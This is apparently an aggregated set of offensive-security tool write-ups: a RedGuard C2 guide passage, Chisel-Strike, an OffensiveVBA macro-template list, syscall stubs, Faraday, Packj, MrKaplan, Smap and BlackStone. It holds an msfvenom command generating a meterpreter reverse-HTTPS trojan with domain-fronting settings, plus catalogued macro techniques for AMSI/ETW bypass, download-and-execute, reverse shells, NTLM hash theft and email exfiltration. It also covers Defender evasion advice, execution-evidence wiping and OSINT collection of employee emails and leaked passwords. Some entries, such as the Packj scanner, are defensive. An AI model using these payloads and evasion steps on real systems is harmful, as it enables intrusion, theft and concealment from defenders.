For solo use, we can set an interception policy on the cloud server's firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

And because our basic verification is based on the HTTP HOST request header, what we see in the HTTP traffic is the same as with the domain fronting method, but the cost is lower: only one cloud server is needed.

 

For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine.

Metasploit

Generates Trojan

$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com -f exe -o ~/path/to/payload.exe

Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that the OverrideRequestHost setting must be set to true. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the Host header of forwarded requests. This is clearly not what we are asking for. Using the OverrideRequestHost configuration value, we can force Metasploit to ignore the incoming Host header and instead use the LHOST configuration value pointing to the origin CloudFront domain.

The listener's check-in port is set to the RedGuard reverse proxy port, and its listening port is the actual check-in port of the local machine.

 

RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to be improved and updated, and I hope it becomes known to more security practitioners. The tool's design draws on the ideas of RedWarden.

We welcome everyone to put forward your needs; RedGuard will continue to grow and improve with them!

Articles by the developer 风起: https://www.anquanke.com/member.html?memberId=148652

Arsenal ("weapon spectrum") author at the 2022 KCon hacker conference

The 10th ISC Internet Security Conference Advanced Offensive and Defense Forum "C2 Front Flow Control" topic

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

风起于青萍之末,浪成于微澜之间。

0x06 Community

If you have any questions or requirements, you can submit an issue under the project, or contact the tool author by adding WeChat.




Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities


A .NET XOR encrypted cobalt strike aggressor implementation for chisel to utilize faster proxy and advanced socks5 capabilities.


Why write this?

In my experience, socks4/socks4a proxies are quite slow compared to their socks5 counterparts, and most C2 frameworks lack a socks5 implementation. There is a C# wrapper around the Go version of chisel called SharpChisel. This wrapper has a few issues and isn't maintained to the latest version of chisel. It didn't allow using shellcode with donut, reflection methods or execute-assembly. I found a fix for this using the SharpChisel-NG project.

Since the SharpChisel assembly is around 16.7 MB, execute-assembly (which has a hidden size limitation of 1 MB) and similar in-memory methods wouldn't work. To keep most of the execution in memory, I incorporated the NetLoader project by Flangvik, which is executed via execute-assembly to reflectively host and load a XOR-encrypted version of SharpChisel with base64 arguments in memory.
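
For intuition, repeating-key XOR is symmetric: the same operation encrypts and decrypts. A minimal Python sketch (the filenames and key are placeholders, not the aggressor script's actual I/O; the project's chisel-enc command performs the real encryption step):

def xor_crypt(data: bytes, key: bytes) -> bytes:
    # XOR each byte against the repeating key; applying this twice
    # with the same key restores the original bytes.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

with open("SharpChisel.exe", "rb") as f:
    encrypted = xor_crypt(f.read(), b"password")  # placeholder key

with open("SharpChisel.enc", "wb") as f:
    f.write(encrypted)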

As an alternative, it is also possible to implement similar C# proxies like SharpSocks by replacing the appropriate chisel binaries in the project.

Setup

Note: If using a Windows teamserver skip steps 2 and 3.

  1. Clone/download the repository: git clone https://github.com/m3rcer/Chisel-Strike.git

  2. Make all binaries executable:

  • cd Chisel-Strike

  • chmod +x -R chisel-modules

  • chmod +x -R tools

  3. Install Mingw-w64 and mono:

  • sudo apt-get install mingw-w64

  • sudo apt install mono-complete

  4. Import ChiselStrike.cna in cobalt strike using the Script Manager

Recompile binaries from the src folder if needed.

Usage

chisel can be executed on both the teamserver (windows/linux) and the beacon, with either acting as the server/client. A normal execution flow would be to set up a chisel server on the teamserver and create a client on the beacon connecting back to the teamserver.

Commands

  1. chisel <client/server> <command>: Run Chisel on a beacon

  2. chisel-tms <client/server> <command>: Run Chisel on your teamserver

  3. chisel-enc: XOR Encrypt SharpChisel.exe with a password of choice

  4. chisel-jobs: List active chisel jobs on the teamserver and beacon

  5. chisel-kill: Kill active chisel jobs on a beacon

  6. chisel-tms-kill: Kill active chisel jobs on teamserver

Example

OPSEC

NetLoader can easily be obfuscated and used to bypass Defender using projects like NimCrypt2 and the like.

Yet SharpChisel.exe drops a DLL on disk, due to its use of Costura/Fody packages, at a location similar to C:\Users\m3rcer\AppData\Local\Temp\Costura\CB9433C24E75EC539BF34CD1AA12B236\64\main.dll, which is detected by Defender. It is advised to obfuscate the chisel DLLs using projects like gobfuscate in the SharpChisel-NG project and re-build new SharpChisel-NG binaries as shown here.

TODO

  • Figure out a way to avoid SharpChisel dropping main.dll on disk / create a new C# wrapper for chisel.

  • Create a method to parse command output for the chisel-tms command.

Credits



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.


The advantage of grabbing syscalls dynamically is that the signature of the stubs is not included in the file, and you don't have to worry about changing Windows versions.
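
The repository implements this in Nim; purely for illustration, here is the same idea as a Python sketch using the pefile library (assumes a 64-bit ntdll.dll whose unhooked stubs start with mov r10, rcx; mov eax, <number>):

import pefile

# Parse a fresh copy of ntdll.dll straight from disk and read the
# syscall number out of each x64 stub:
#   4c 8b d1        mov r10, rcx
#   b8 XX XX XX XX  mov eax, <syscall number>
pe = pefile.PE(r"C:\Windows\System32\ntdll.dll")
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
    if exp.name and exp.name.startswith(b"Nt"):
        stub = pe.get_data(exp.address, 8)
        if stub[:4] == b"\x4c\x8b\xd1\xb8":
            ssn = int.from_bytes(stub[4:8], "little")
            print(f"{exp.name.decode()} -> syscall {ssn:#x}")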

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents


In preparation for a VBS AV evasion stream/video I was doing some research on Office macro code execution methods and evasion techniques.

The list got longer and longer and I found no central place for offensive VBA templates - so this repo can be used as one. It is far from complete. If you know any other cool technique or useful template, feel free to contribute and create a pull request!

Most of the templates in this repo were already published somewhere. I just copy pasted most templates from ms-docs sites, blog posts or from other tools.


Templates in this repo

File Description
ShellApplication_ShellExecute.vba Execute an OS command via ShellApplication object and ShellExecute method
ShellApplication_ShellExecute_privileged.vba Execute a privileged OS command via ShellApplication object and ShellExecute method - UAC prompt
Shellcode_CreateThread.vba Execute shellcode in the current process via Win32 CreateThread
Shellcode_EnumChildWindowsCallback.vba Execute shellcode in the current process via EnumChildWindows
Win32_CreateProcess.vba Create a new process for code execution via Win32 CreateProcess function
Win32_ShellExecute.vba Create a new process for code execution via Win32 ShellExecute function
WMI_Process_Create.vba Create a new process via WMI for code execution
WMI_Process_Create2.vba Another WMI code execution example
WscriptShell_Exec.vba Execute an OS command via WscriptShell object and Exec method
WscriptShell_run.vba Execute an OS command via WscriptShell object and Run method
VBA-RunPE @itm4n's RunPE technique in VBA
GadgetToJScript med0x2e's C# script for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.
PPID_Spoof.vba christophetd's spoofing-office-macro copy
AMSIBypass_AmsiScanBuffer_ordinal.vba rmdavy's AMSI Bypass to patch AmsiScanBuffer using ordinal values for a signature bypass
AMSIBypass_AmsiScanBuffer_Classic.vba rasta-mouse's classic AmsiScanBuffer patch
AMSIBypass_Heap.vba rmdavy's HeapsOfFun repo copy
AMSIbypasses.vba outflanknl's AMSI bypass blog
COMHijack_DLL_Load.vba Load DLL via COM Hijacking
COM_Process_create.vba Create process via COM object
Download_Autostart.vba Download a file from a remote webserver and put it into the StartUp folder
Download_Autostart_WinAPI.vba Download a file from a remote webserver via URLDownloadToFileA and put it into the StartUp folder
Dropper_Autostart.vba Drop batch file into the StartUp folder
Registry_Persist_wmi.vba Create StartUp registry key for persistence via WMI
Registry_Persist_wscript.vba Create StartUp registry key for persistence via wscript object
ScheduledTask_Create.vba Create and start scheduled task for code execution/persistence
XMLDOM_Load_XSL_Process_create.vba Load XSL from a remote webserver to execute code
regsvr32_sct_DownloadExecute.vba Execute regsvr32 to download a remote webserver's SCT file for code execution
BlockETW.vba Patch EtwEventWrite in ntdll.dll to block ETW data collection
BlockETW_COMPLUS_ETWEnabled_ENV.vba Block ETW data collection by setting the environment variable COMPLUS_ETWEnabled to 0, credit to @xpn
ShellWindows_Process_create.vba ShellWindows Process create to get explorer.exe as parent process
AES.vba An example to use AES encryption/decryption in VBA from Here
Dropper_Executable_Autostart.vba Get executable bytes from VBA and drop into Autostart - no download in this case
MarauderDrop.vba Drop a COM registered .NET DLL into temp, import the function and execute code - in this case loads a remote C# binary from a webserver to memory and executes it - credit to @Jean_Maes_1994 for MaraudersMap
Dropper_Workfolders_lolbas_Execute.vba Drop an embedded executable into the TEMP directory and execute it using C:\windows\system32\Workfolders.exe as LOLBAS - credit to @YoSignals
SandBoxEvasion Some SandBox Evasion templates
Evasion Dropper Autostart.vba Drops a file to the Startup directory bypassing file write monitoring via renamed folder operation
Evasion MsiInstallProduct.vba Installs a remote MSI package using WindowsInstaller ActiveXObject avoiding spawning suspicious office child process, the msi installation will be executed as a child of the MSIEXEC /V service
StealNetNTLMv2.vba Steal NetNTLMv2 Hash via share connection - credit to https://book.hacktricks.xyz/windows/ntlm/places-to-steal-ntlm-creds
Parse-Outlook.vba Parses Outlook for sensitive keywords and file extensions, and exfils them via email - credit to JohnWoodman
Reverse-Shell.vba Reverse shell written entirely in VBA using Windows API calls - credit to JohnWoodman

Missing - ToDos

File Description
Unhooker.vba Unhook API's in memory to get rid of hooks
Syscalls.vba Syscall usage - fresh from disk or Syswhispers like
Manymore.vba If you have any more ideas feel free to contribute

Obfuscators / Payload generators

  1. VBad
  2. wePWNise
  3. VisualBasicObfuscator - needs some modification as it doesn't split up lines and is therefore not usable for office document macros
  4. macro_pack
  5. shellcode2vbscript.py
  6. EvilClippy
  7. OfficePurge
  8. SharpShooter
  9. VBS-Obfuscator-in-Python - needs some modification as it doesn't split up lines and is therefore not usable for office document macros

Credits / useful resources

ASR bypass: http://blog.sevagas.com/IMG/pdf/bypass_windows_defender_attack_surface_reduction.pdf

Shellcode to VBScript conversion: https://github.com/DidierStevens/DidierStevensSuite/blob/master/shellcode2vbscript.py

Bypass AMSI in VBA: https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/

VBA purging: https://www.mandiant.com/resources/purgalicious-vba-macro-obfuscation-with-vba-purging

F-Secure VBA Evasion and detection post: https://blog.f-secure.com/dechaining-macros-and-evading-edr/

One more F-Secure blog: https://labs.f-secure.com/archive/dll-tricks-with-vba-to-improve-offensive-macro-capability/



Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform


Faraday was built from within the security community, to make vulnerability management easier and enhance our work. What IDEs are to programming, Faraday is to pentesting.

Offensive security has two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve further work.

This new update brings a new scanning, reporting and UI experience.


Focus on pentesting

Get your work organized and focus on what you do best. With Faraday Community, you may focus on pentesting while we help you with the rest.

Check out the documentation here.

Installation

The easiest way to get Faraday up and running is using our docker-compose:

# Docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml

$ docker-compose up

Manage your findings

Manage, classify and triage your results through Faraday’s dashboard, designed with and for pentesters.

Get an overview of your vulnerabilities and ease your work.




By right clicking on any vulnerability, you may filter, tag and classify your results with ease. You may also add comments to vulnerabilities and add evidence with just a few clicks



In the asset tab, information on each asset is presented, for a detailed follow-up on every device in your network. This insight might be especially useful if you hold critical data on certain assets, so the impact of vulnerabilities may be assessed through this information. If responsibilities over each asset are clear, this view helps to organize and follow the work of asset owners too.

Here, you can obtain information about the OS, services, ports and vulnerabilities associated with each of your assets, which will give you a better understanding of your scope and help you to gain an overview of what you are assessing.




Use your favorite tools

Integrate scanners with Faraday Agents Dispatcher. This feature allows you to orchestrate the most commonly used security tools and have everything available from your Faraday instance. Once your scan is finished, you will be able to see all the results in the main dashboard.


Choose the scanners that best fit your needs.



Share your results

Once you’re done, export your results in a CSV format.

Check out some of our features

Full centralization

With Faraday, you may oversee your cybersecurity efforts, prioritize actions and manage your resources from a single platform.

Elegant integration of scanning tools

Make sense of today’s overwhelming number of tools. Faraday’s technology aligns 80+ key plugins with your current needs, normalizing and deduplicating vulnerabilities.

Powerful Automation

Save time by automating pivotal steps of Vulnerability Management. Scan, create reports, and schedule pipelines of custom actions, all following your requirements.

Intuitive dashboard

Faraday’s intuitive dashboard guides teams through vulnerability management with ease. Scan, analyze, automate, tag, and prioritize, each with just a few clicks.

Smart visibility

Get full visibility of your security posture in real-time. Advanced filters, navigation, and analytics help you strategize and focus your work.

Easier teamwork

Coordinate efforts by sending tickets to Jira, Gitlab, and ServiceNow directly from Faraday.

Planning ahead

Manage your security team with Faraday planner. Keep up by communicating with your peers and receiving notifications.

Work as usual, but better

Get your work organized on the run when pentesting with Faraday CLI.

Proudly Open Source

We believe in the power of teams; most of our integrations and core technologies are open source, allowing any team to build custom implementations and integrations.

For more information check out our website www.faradaysec.com


Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.

The highlights of Kali’s 2022.3 release:

For more details, see the bug tracker changelog.


More info here.


Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager: pypi, npm, or rubygems
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, and dependencies. Packages with expired email domains, large release time gaps, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and the package title, you can verify that the package was indeed created from that repo, which helps mitigate starjacking attacks.

Containerized

The best way to use Packj is to run it inside Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [mail@substack.net]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17.0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted can be specified using ==, as in the example below:

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [me@kennethreitz.org]
[+] Checking email/domain validity...OK [me@kennethreitz.org]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [nicholas+npm@nczconsulting.com]
[+] Checking email/domain validity...OK [nicholas+npm@nczconsulting.com]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyzes it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry into a temp dir. Then, Packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from the OSV database.
  • PyPI and NPM package download counts are fetched from pypistats and npmjs.
  • All risks detected are aggregated and reported.

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for include:

Attribute | Type | Description | Reason
Release date | Metadata | Version release date, to flag old or abandoned packages | Old or unmaintained packages do not receive security fixes
OS or lang APIs | Code | Use of sensitive APIs, such as exec and eval | Malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys)
Contributors' email | Metadata | Email addresses of the contributors | Incorrect or invalid email addresses suggest a lack of 2FA
Source repo | Metadata | Presence and validity of a public source repo | Absence of a public repo means no easy way to audit or review the source code publicly

The full list of the attributes we track can be viewed in threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with the goal of assisting developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv.

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them have been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [KrisWuQian@baidu.com]
[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undesirable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to the absence of a source repo and the use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware. Please reach out to us at oss@ossillate.com for the full list.

Resources

To learn more about the Packj tool or open-source software supply chain attacks, refer to our resources below.


Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust support is a work in progress and will be available in the last week of July '22.
  • Add functionality to detect several other "risky" code as well as metadata attributes.
  • Packj currently only performs static code analysis; we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base64-encoded string that gets decoded and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as spawning of shell commands (exec system call). For example, Packj can flag use of the getattr() and eval() APIs as they indicate "runtime code generation"; a developer can then take a deeper look. See main.py for details.
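
For illustration, a hypothetical pattern of this kind looks like the snippet below: the payload string is unreadable to a human reviewer, but the base64 decode and eval() calls themselves remain visible to static analysis and can be flagged as runtime code generation.

import base64

# Hypothetical malicious pattern: the payload is hidden from a human reader,
# but the base64.b64decode() and eval() calls are still visible to static analysis.
payload = "cHJpbnQoJ293bmVkJyk="  # base64 for: print('owned')
eval(compile(base64.b64decode(payload), "<hidden>", "exec"))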

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (i.e., not obfuscated in a base64-encoded string). But Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for its functionality -- there's no getting around them. Having said that, sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See the roadmap for details.



MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution


MrKaplan is a tool aimed at helping red teamers stay hidden by clearing evidence of execution. It works by saving information such as the time it ran and snapshots of files, and by associating each piece of evidence with the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certain operations and leave artifacts for blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with the begin flag, and whenever you finish, run it again with the end flag (see the sketch after this list).
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.
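
A minimal workflow might look like the following sketch (the script name and parameter spelling here are assumptions; check the wiki page for the exact syntax):

# hypothetical invocation before starting operations
.\MrKaplan.ps1 -Begin
# ... red team operations ...
# hypothetical invocation once you are done
.\MrKaplan.ps1 -End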

IOCs

  • PowerShell process that accesses the artifacts mentioned in the wiki page.

  • PowerShell process importing a weird base64 blob.

  • PowerShell process that performs token manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage done to your computer/programs as a result of this project. I happily accept contributions; make a pull request and I will review it!



Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes the same command line arguments as Nmap and produces the same output, which makes it a drop-in replacement for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all of Nmap's output formats
  • Service and version fingerprinting
  • Makes no contact to the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/smap@latest

Confused or something not working? For more detailed instructions, click here

AUR package

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also available on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, separated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1         // IPv4 address
example.com     // hostname
178.23.56.0/8   // CIDR

Output

Smap supports 6 output formats which can be used with the -o* options as follows:

smap example.com -oX output.xml

If you want to print the output to the terminal, use a hyphen (-) as the filename.

Supported formats

oX    // nmap's xml format
oG    // nmap's greppable format
oN    // nmap's default format
oA    // output in all 3 formats above at once
oP    // IP:PORT pairs separated by newlines
oS    // custom smap format
oJ    // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.
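
For example, to print results for a host straight to the terminal in Smap's own format, including the vulnerability and tag data:

smap example.com -oS -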

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existing port data from shodan.io, it is super fast, but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


BlackStone - Pentesting Reporting Tool

Pentesting Reporting Tool (1)


The BlackStone project is a tool created to automate the work of drafting and submitting reports on ethical hacking or pentesting audits.

In this tool we can register in the database the vulnerabilities found during the audit, classifying them as internal, external, or wifi. In addition, we can add a description and recommendation for each, as well as the level of severity and the effort required for its correction. This information will then help us generate a criticality table in the report as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool; in my case I use MAMP (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository, and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts, we will go to C:\MAMP\htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work, we will have to import the database: go to the browser and open "localhost/phpMyAdmin/". The database connection file is in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After adding vulnerabilities to the database, we will go to the audited client section and register a client along with their web page. Once registered, we can go to customer details and see the following information:

  • Name of the business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Check for exposed passwords of the company owner on the deep web
  • Subdomains of the website, as well as information of interest found in Google
  • Emails of company workers

THIS APPLICATION IS FOR PROFESSIONAL USE ONLY; THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE.

Pentesting Reporting Tool (4)

Once the company we are going to audit is registered in the database, we will create a report, adding the date, the name of the report, and the company to be audited. When we register the report, we will click edit and then select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button. We then save the generated page as ".mht" and open it with Word to work on the report:

